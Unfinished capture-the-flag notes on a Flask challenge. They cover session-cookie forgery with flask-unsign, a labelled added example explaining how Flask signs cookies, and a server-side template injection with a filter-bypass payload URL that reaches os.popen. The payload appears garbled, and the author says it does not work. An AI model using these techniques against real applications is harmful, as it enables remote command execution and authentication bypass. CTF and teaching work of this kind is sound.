
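SSTI Challenge Notes (Unfinished)

Author: Internet

1. Flask session forgery

At first I didn't recognize that this was Flask.

Flask has a special config (config.py), which sets the secret_key used to build the session. Reference: https://www.jianshu.com/p/278d4f59839d

Read the file

Forging a Flask session requires installing the flask-unsign package: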

pip install flask-unsign

Next, capture the request and first decode the session into plaintext. For usage, see: https://github.com/Paradoxis/Flask-Unsign

The plaintext is

{'username':b'guest'}

Forging
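Why the decode step needs no key while everything after it depends on secret_key, shown as an added example that is not part of the original post. It assumes Flask's default cookie layout (payload.timestamp.signature, salt "cookie-session", HMAC-SHA1); the key and the cookie are constructed sample values and the function names are hypothetical.

```python
import base64, hashlib, hmac, json, time, zlib

def b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")

def b64d(text: bytes) -> bytes:
    return base64.urlsafe_b64decode(text + b"=" * (-len(text) % 4))

def signature(secret_key: bytes, signed_part: bytes) -> bytes:
    # Assumption: Flask defaults (salt "cookie-session", HMAC-SHA1 key derivation and digest).
    derived = hmac.new(secret_key, b"cookie-session", hashlib.sha1).digest()
    return b64e(hmac.new(derived, signed_part, hashlib.sha1).digest())

def read_payload(cookie: bytes) -> dict:
    # No key needed: the payload is base64url JSON, zlib-compressed if the cookie starts with ".".
    compressed = cookie.startswith(b".")
    raw = b64d((cookie[1:] if compressed else cookie).split(b".")[0])
    return json.loads(zlib.decompress(raw) if compressed else raw)

def is_authentic(cookie: bytes, secret_key: bytes) -> bool:
    # The server recomputes the HMAC over "payload.timestamp" and compares in constant time.
    signed_part, _, sig = cookie.rpartition(b".")
    return hmac.compare_digest(sig, signature(secret_key, signed_part))

def make_constructed_cookie(secret_key: bytes) -> bytes:
    # Constructed sample: b'guest' in Flask's tagged-JSON form for bytes, {" b": base64}.
    data = {"username": {" b": base64.b64encode(b"guest").decode()}}
    payload = b64e(json.dumps(data, separators=(",", ":")).encode())
    signed_part = payload + b"." + b64e(int(time.time()).to_bytes(4, "big"))
    return signed_part + b"." + signature(secret_key, signed_part)

if __name__ == "__main__":
    key = b"constructed-demo-key"  # constructed value, not from the challenge
    cookie = make_constructed_cookie(key)
    print(read_payload(cookie))        # readable without the key
    print(is_authentic(cookie, key))   # signature matches the payload
    edited = b64e(b'{"username":"admin"}') + cookie[cookie.index(b"."):]
    print(is_authentic(edited, key))   # payload changed, old signature no longer matches
```

The practical consequence for an application owner: session contents are readable by the client, so nothing confidential belongs in them, and secret_key must be random and kept out of any file or template variable that a file read or template injection can reach.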


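2. Flask template injection

Trying to view the file directly runs into a filter.

Fuzz it

The dot, config, the underscore, and args are filtered.

Bypass references: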

https://blog.csdn.net/q20010619/article/details/107553119

https://blog.csdn.net/miuzzx/article/details/110220425

The way the request is made is wrong; I'll look into where the mistake is when I have time.

http://xmctf.top:8901/?name={{%22%22[request[%22values%22][%22class%22]][request[%22values%22][%22mro%22]][1]request[%22values%22][%22subclasses%22][286][request[%22values%22][%22init%22]][request[%22values%22][%22globals%22]][%22os%22]%22popen%22request[%22values%22][%22read%22]}}

Source: https://www.cnblogs.com/echoDetected/p/14775783.html